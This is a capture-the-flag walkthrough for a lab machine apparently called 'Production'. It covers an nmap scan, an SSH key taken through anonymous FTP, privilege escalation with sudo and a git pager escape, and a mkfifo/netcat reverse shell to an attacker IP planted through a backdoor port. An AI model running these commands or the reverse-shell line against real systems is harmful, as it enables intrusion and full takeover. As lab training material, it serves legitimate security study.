KoTH Production
IP: 10.10.224.175
Let's search for Open Ports via Nmap:
nmap -sC -sV -oN nmap/initial 10.10.224.175
21
22
139
445
9001
9002
We can see anonymous login enabled for ftp:
Let's login Then (:
We get id-rsa of a user, if we get the public key too, and cat that out we can see the id_rsa was of user ashu
Login via user Ashu:
First you need to give the id_rsa read,write permissions using
chmod 600 id_rsa
Let's login-
ssh -i id_rsa ashu@10.10.224.175
Getting root via user ashu:
Let's check for sudo abilities for ashu
sudo -l
We see, we can just directly switch to user skidy with sudo-
sudo su skidy
YAY!
Now, before priv-esc, if we try to look into the home directory of user skidy, we will find a
directory named homework, and in there there's a python script server1.py, if you cat that
you'll find the password you need to enter to access the backdoor on port 9001
Let's check for the sudo abilities of user skidy:
We see /usr/bin/git there, let's check its gtfo-bins page
After doing-
sudo git -p help config
we can type !/bin/bash to get root
Getting Root via port 9001, 9002:
nc 10.10.224.175 9001
It is a backdoor for user ashu...
put the pass we found in the python script in the home directory of user skidy y......!
On port 9001, do-
echo "#!/bin/bash\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.91.66 8888 >/tmp/f" > /tmp/a; chmod +x /tmp/a
Now, let's use port 9002 to get a rev-shell on the port we put above-
nc 10.10.224.175 9002
to get a rev-shell on port 8888, start a netcat listener on your machine
nc -lnvp 8888
NOW on port 9002, run the command-
/tmp/./a
Yep, we got our shell as root (:
Thanks For Reading <3